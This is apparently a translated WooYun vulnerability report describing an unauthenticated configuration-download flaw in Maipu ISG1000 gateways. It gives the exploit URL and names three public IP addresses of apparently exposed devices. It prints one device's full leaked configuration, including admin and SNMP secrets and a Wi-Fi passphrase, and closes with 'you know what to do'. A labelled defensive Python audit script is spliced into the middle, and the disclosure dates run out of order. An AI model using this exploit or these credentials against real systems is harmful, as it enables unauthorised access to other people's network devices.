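2014-10-21: Details reported to the vendor; awaiting vendor handling
2014-10-26: Vendor chose to ignore the vulnerability; details opened to third-party security partners
2014-12-20: Details disclosed to core white hats and experts in related fields
2014-12-30: Details disclosed to regular white hats
2015-01-09: Details disclosed to intern white hats
2014-12-30: Details disclosed to the public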
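As the title says.
According to the vendor's website, the Maipu ISG1000 series of gateways comprises 9 products:
http://www.maipu.cn/productmes.aspx?id=2266
Because of a permissions problem, the gateway configuration file can be downloaded without authorization. It is exploited as follows: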
https://url/system/maintenance/export.php?type=sc
https://122.224.165.114/login.html
https://119.4.164.42/login.html
https://61.143.203.86/login.html
<poc>
!
config
authorized-table admin
 authorized read all
 authorized write all
!
user administrator admin local secret Hg6MAD7MGTUEcoT9gHG+LhDc6E07QwG71SmiEodL/fQT/YirzsAURqDjk69469y authorized-table admin
user administrator admin authorized-address first 0.0.0.0/0
!
timezone 57
!
!
wlan global config
wlan-global
wlan country-code default
wlan channel auto
wlan max-power default
wlan radio-type 80211bgn
wlan enable
!
interface bvi1
 ip address 192.168.2.254/24
 allow access https
 allow access http
 allow access ping
 allow access ssh
 allow access telnet
!
interface eth0
 ip address 122.224.165.114/30
 allow access https
 allow access http
 allow access ping
 allow access ssh
 allow access telnet
!
interface eth1
 ip address 123.157.156.230/30
 allow access https
 allow access http
 allow access ping
 allow access ssh
 allow access telnet
!
interface eth2
 bridge-group 1
!
interface eth3
 bridge-group 1
!
interface eth4
 bridge-group 1
 allow access https
 allow access http
 allow access ping
 allow access ssh
 allow access telnet
!
interface eth5
 bridge-group 1
!
interface eth6
 bridge-group 1
!
interface eth7
 bridge-group 1
!
interface eth8
 bridge-group 1
!
interface eth9
 bridge-group 1
!
interface wlan0
 ssid maipu
 ssid hide disable
 beacon interval default
 client max-count 30
 client isolation disable
 dtim default
 security-mode wpa2
 wpa2 auth-method psk maipu123 encry-method aes
!
!
address
!
address lan
 description neiwang
 ip subnet 192.168.2.0/24
!
!
address-group
!
!
service
!
!
service-group
!
service-group 常用服务
!
service-group 常用服务
 member telnet
 member tcp
 member ping
 member dns
 member icmp
 member https
 member http
!
!
schedule-day
!
!
schedule-week
!
!
schedule-month
!
!
schedule-once
!
!
user
!
!
user-group
!
!
!
user-policy
!
!
application-group p2p
 description p2p下载
application-group 流媒体
 description 流媒体软件
application-group 网络游戏
!
!
!
policy any any any any any any p2p always deny 1
 application 流媒体
 application 网络游戏
policy any any any any 常用服务 any any always permit 2
policy default-action permit
!
snmp
 community secret 6NSjZ2FJfHqUtCqRXdechDETsW7nP4FFcq1ujxx1HotuCZoZGsn14R7gwFVplw1
 syslocation Beijing
!
dhcp
 share-net wlan0_dhcps subnet 192.168.0.1/24
 share-net wlan0_dhcps 192.168.0.1 192.168.0.250 0 days 8 hours 0 mins
 share-net wlan0_dhcps gateway 192.168.0.1
 share-net wlan0_dhcps dns 202.106.0.20 8.8.8.8
!
!
router ospf
!
!
ip route 0.0.0.0/0 122.224.165.113
ip route 0.0.0.0/0 123.157.156.229 100 weight 100
!
!
user-param
!
!
user-webauth
!
!
user-portal-server
!
ip nat source eth0 lan any any interface 1
ip nat source eth1 lan any any interface 2
!
!
!
ip session limit
!
!
!
audit_log database on
audit_log syslog on
!
ip defend port-scan interface eth0 threshold 1000
ip defend ip-sweep interface eth0 threshold 1000
ip defend port-scan interface eth1 threshold 1000
ip defend ip-sweep interface eth1 threshold 1000
ip defend port-scan interface bvi1 threshold 1000
ip defend ip-sweep interface bvi1 threshold 1000
!
qos-profile line 电信
 limit both
 maxbandwidth ingress 20000
 maxbandwidth egress 20000
 match interface eth0
!
qos-profile channel 限速 parent 电信
 bandwidth ingress 2000
 maxbandwidth ingress 20000
 bandwidth egress 2000
 maxbandwidth egress 20000
 perip ingress 2000
 perip egress 2000
 priority high
 match user any
 match application any
!
qos-profile channel def_电信 parent 电信
!
ha-config
!
end
The ciphertext is presumably base64(3des(md5(xxx),keys))
</poc>
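A defender-side audit of an exported configuration like the one above, as an added example that is not part of the original report or of Maipu's tooling: it flags administrator logins open to any source address and `allow access` management services on non-RFC 1918 or cleartext-capable interfaces. It assumes one command per line with sub-commands indented by a space; `audit`, `SAMPLE` and the sample addresses are constructed for illustration.

```python
import ipaddress

# Constructed sample in the stanza style of the exported configuration;
# addresses are documentation/RFC 1918 values, not taken from the page.
SAMPLE = """\
!
user administrator admin authorized-address first 0.0.0.0/0
!
interface bvi1
 ip address 192.168.2.254/24
 allow access https
 allow access telnet
!
interface eth0
 ip address 203.0.113.10/30
 allow access https
 allow access telnet
!
end
"""

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
CLEARTEXT = {"http", "telnet"}

def audit(config_text):
    """Return (scope, finding) tuples for risky management-plane settings."""
    findings, iface, addr = [], None, None
    for raw in config_text.splitlines():
        words = raw.split()
        if not words or words == ["!"]:
            continue
        if not raw.startswith(" "):  # top-level command: a new stanza begins
            iface = words[1] if words[0] == "interface" and len(words) > 1 else None
            addr = None
            if "authorized-address" in words and "0.0.0.0/0" in words:
                findings.append(("admin", "login permitted from any source address"))
        elif iface and words[:2] == ["ip", "address"] and len(words) > 2:
            addr = ipaddress.ip_interface(words[2]).ip
        elif iface and addr is not None and words[:2] == ["allow", "access"] and len(words) > 2:
            proto = words[2]
            if proto != "ping" and not any(addr in net for net in RFC1918):
                findings.append((iface, f"{proto} management on non-RFC1918 address {addr}"))
            elif proto in CLEARTEXT:
                findings.append((iface, f"cleartext {proto} management enabled"))
    return findings

if __name__ == "__main__":
    for scope, finding in audit(SAMPLE):
        print(f"{scope}: {finding}")
```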
It's a permissions problem; you know what to do.
Severity: no impact (ignored by vendor)
Ignored at: 2014-12-30 14:44
Vulnerability Rank: 12 (WooYun rating)
None yet